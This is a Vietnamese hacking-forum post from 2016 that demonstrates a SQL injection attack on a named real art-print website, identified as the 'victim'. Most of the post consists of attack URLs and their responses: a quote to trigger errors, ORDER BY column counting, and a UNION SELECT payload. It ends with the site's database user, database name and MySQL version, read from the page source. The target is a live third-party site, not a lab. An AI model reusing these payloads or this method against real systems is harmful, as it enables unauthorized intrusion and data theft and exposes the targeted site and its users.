Pair of Vintage Old School Fru
logo

Chatbox|Admin nhận làm wap/web, giá cả thương lượng... Thông tin admin tại mỗi bài viết.
Home · Bang hội ·
* Đăng Nhập hoặc Đăng Kí để sử dụng hết chức năng của diễn đàn.
Hi, Khách!
HomeBang hội » Wapmaster » Hacking » » Xem bài viết
Tìm kiếm
Xuống dưới »
avatar by Pham_loi Pham_loi
Chức vụ:
09:13:21, 18-02-2016
Union không hiện số

Victim : http://www.art4all.eu/
link bug :

Mã:
http://www.art4all.eu/see_it_framed.php?frame=3079-none-0-0.000%3B3080-Groningen-136-25.000%3B3081-Firenze-136-30.000%3B3082-Eindhoven-136-25.000%3B3219-Malaga-144-30.000%3B3221-Cordoba-152-28.000%3B3222-Rome-144-30.000%3B3223-Nice-144-32.000%3B3224-Cannes-144-20.000%3B3227-Ronda-144-35.000%3B41234-San+Francisco-144-32.000%3B41235-Antwerp-152-35.000%3B41236-Haiti-152-32.000%3B41240-Buenos+Aires-152-35.000%3B174530-Sydney-152-35.000%3B174531-Oslo-152-36.000%3B174533-Rotterdam-152-37.000%3B174536-Cardiff-152-37.000%3B174538-Tokyo-152-32.000%3B174539-Tel+Aviv-152-32.000%3B174541-Cuba-152-32.000%3B174545-Honduras-152-32.000%3B174549-Bali-152-32.000%3B174550-Santorini-152-32.000%3B174551-Phuket-152-32.000%3B174562-Bankok-152-32.000%3B174563-Davos-152-32.000%3B174564-Chaing+Mai-0-32.000%3B174565-Sevilla-152-32.000&product=52852&img=&opt=749&height=495&width=910&modal=true&curr=%26%23163%3B&price=160&mode=inner
Copy code

nhìn hoa mắt tý thôi
thực ra em nó dính bug ở biến product
edit lại thành ==>>

Mã:
http://www.art4all.eu/see_it_framed.php?product=52852
Copy code

thêm dấu ' cái nhỉ lỗi quen thuộc

Mã:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''52852'' order by option_id' at line 1
Copy code

check tiếp

Mã:
http://www.art4all.eu/see_it_framed.php?product=52852 order by 2000000--
Copy code

==>>ẹc ko thấy gì hết
thử kiểu khác

Mã:
http://www.art4all.eu/see_it_framed.php?product=52852' order by 2000000-- -
Copy code

==>>hehe chít với mẹ cháu rồi nhá

Mã:
Unknown column '2000000' in 'order clause'
Copy code

tiếp tục nào

Mã:
http://www.art4all.eu/see_it_framed.php?product=52852' order by 2-- -
Copy code

==>>Unknown column '2' in 'order clause'

Mã:
http://www.art4all.eu/see_it_framed.php?product=52852' order by 1-- -
Copy code

==>> okie rùi
tiếp tục với union

Mã:
http://www.art4all.eu/see_it_framed....N SELECT 1-- -
Copy code

==>>Hjx sao vẫn thế nhỉ ko thấy số 1 đâu cả
thử view source phát
đoạn này có vẻ khả nghi

Mã:
<script type=text/javascript">
var OptionName=option_52852' and 1=0 UNION SELECT 1-- -_1";
//alert(OptionName);
var PainSize;
if(document.getElementById(OptionName))
Copy code

check lại phát

Mã:
http://www.art4all.eu/see_it_framed.php?product=52852' and 1=0 UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -
Copy code

==>basic info
view source tiếp

Mã:
var OptionName=option_52852' and 1=0 UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -_art4all@localhost : admin2_art4all : 5.0.45";
//alert(OptionName);
var PainSize;
if(document.getElementById(OptionName))
Copy code

version 5.0.45
Like: 0
Trực Tuyến: Khách: 1
Online: 1/27
Thành viên: 154
Diễn đàn teen Việt Nam
CopyRight 2014